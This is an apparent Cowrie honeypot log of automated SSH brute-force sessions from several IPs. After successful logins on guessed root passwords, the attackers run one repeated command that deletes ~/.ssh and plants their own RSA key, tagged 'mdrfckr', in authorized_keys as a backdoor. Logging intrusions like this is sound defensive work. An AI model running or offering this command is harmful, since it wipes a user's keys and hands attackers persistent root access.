{"eventid":"cowrie.login.success","username":"root","password":"Admin2","message":"login attempt [root/Admin2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:13:57.309033Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:13:57.813972Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:13:57.814651Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:13:57.815879Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:58.061991Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:13:58.661662Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:13:58.662339Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:13:58.908832Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:58.909678Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.session.connect","src_ip":"103.81.85.71","src_port":56834,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff97f100f97","protocol":"ssh","message":"New connection: 103.81.85.71:56834 (1.2.3.4:22) [session: aff97f100f97]","sensor":"my-vps","timestamp":"2025-08-26T02:13:59.148388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:59.149306Z","src_ip":"103.81.85.71","session":"aff97f100f97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:59.389230Z","src_ip":"103.81.85.71","session":"aff97f100f97"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:14:00.398279Z","src_ip":"103.81.85.71","session":"aff97f100f97"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:01.641971Z","src_ip":"103.81.85.71","session":"aff97f100f97"}
{"eventid":"cowrie.session.connect","src_ip":"103.81.85.71","src_port":34476,"dst_ip":"1.2.3.4","dst_port":22,"session":"a54a510d62d1","protocol":"ssh","message":"New connection: 103.81.85.71:34476 (1.2.3.4:22) [session: a54a510d62d1]","sensor":"my-vps","timestamp":"2025-08-26T02:14:01.881098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:01.882212Z","src_ip":"103.81.85.71","session":"a54a510d62d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:02.124506Z","src_ip":"103.81.85.71","session":"a54a510d62d1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:14:03.126408Z","src_ip":"103.81.85.71","session":"a54a510d62d1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:03.367646Z","src_ip":"103.81.85.71","session":"a54a510d62d1"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:03.369601Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47430,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9b47cd165a6","protocol":"ssh","message":"New connection: 212.227.235.229:47430 (1.2.3.4:22) [session: e9b47cd165a6]","sensor":"my-vps","timestamp":"2025-08-26T02:14:26.869115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:26.870231Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:27.128615Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123..","message":"login attempt [root/Root123..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:14:28.204551Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:14:28.778370Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:14:28.779251Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:14:28.780499Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:29.039500Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:14:29.576015Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:14:29.576810Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:14:29.839067Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:29.840410Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47432,"dst_ip":"1.2.3.4","dst_port":22,"session":"d51f76e53fa3","protocol":"ssh","message":"New connection: 212.227.235.229:47432 (1.2.3.4:22) [session: d51f76e53fa3]","sensor":"my-vps","timestamp":"2025-08-26T02:14:30.119720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:30.120697Z","src_ip":"212.227.235.229","session":"d51f76e53fa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:30.401875Z","src_ip":"212.227.235.229","session":"d51f76e53fa3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:14:31.566020Z","src_ip":"212.227.235.229","session":"d51f76e53fa3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:32.848961Z","src_ip":"212.227.235.229","session":"d51f76e53fa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47434,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b2685644ab9","protocol":"ssh","message":"New connection: 212.227.235.229:47434 (1.2.3.4:22) [session: 0b2685644ab9]","sensor":"my-vps","timestamp":"2025-08-26T02:14:33.107428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:33.108319Z","src_ip":"212.227.235.229","session":"0b2685644ab9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:33.366978Z","src_ip":"212.227.235.229","session":"0b2685644ab9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:14:34.446641Z","src_ip":"212.227.235.229","session":"0b2685644ab9"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:34.704935Z","src_ip":"212.227.235.229","session":"e9b47cd165a6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:34.706205Z","src_ip":"212.227.235.229","session":"0b2685644ab9"}
{"eventid":"cowrie.session.connect","src_ip":"27.254.137.144","src_port":35966,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa32bfae806a","protocol":"ssh","message":"New connection: 27.254.137.144:35966 (1.2.3.4:22) [session: aa32bfae806a]","sensor":"my-vps","timestamp":"2025-08-26T02:14:36.931292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:14:36.932067Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:14:37.115318Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.login.success","username":"root","password":"Tj123456.","message":"login attempt [root/Tj123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:14:37.890211Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:14:38.320901Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:14:38.321550Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:14:38.323107Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:14:38.507263Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:14:38.892163Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:14:38.892829Z","src_ip":"27.254.137.144","session":"aa32bfae806a"}
